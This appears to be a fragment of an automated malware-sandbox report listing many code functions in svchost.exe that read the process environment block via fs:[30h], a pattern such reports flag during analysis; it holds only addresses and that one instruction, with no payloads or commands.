Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]	2_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]	2_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]	2_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]	2_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]	2_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]	2_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]	2_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]	2_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]	2_2_03232050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]	2_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032280A0 mov eax, dword ptr fs:[00000030h]	2_2_032280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]	2_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]	2_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0322A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]	2_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]	2_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0322C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]	2_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]	2_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]	2_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]	2_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]	2_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]	2_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]	2_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]	2_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]	2_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]	2_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]	2_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]	2_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]	2_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]	2_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]	2_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]	2_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]	2_2_03268620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]	2_2_0323262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]	2_2_032AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]	2_2_03272619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]	2_2_03262674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]	2_2_0324C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0326C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]	2_2_032666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]	2_2_032C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]	2_2_03264588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]	2_2_0326E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]	2_2_032325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]	2_2_032365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]	2_2_0322C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]	2_2_0326A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]	2_2_032BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]	2_2_032EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]	2_2_0322645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]	2_2_0325245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]	2_2_032364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]	2_2_032644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_032BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]	2_2_032EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]	2_2_032304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304B00 mov eax, dword ptr fs:[00000030h]	2_2_03304B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
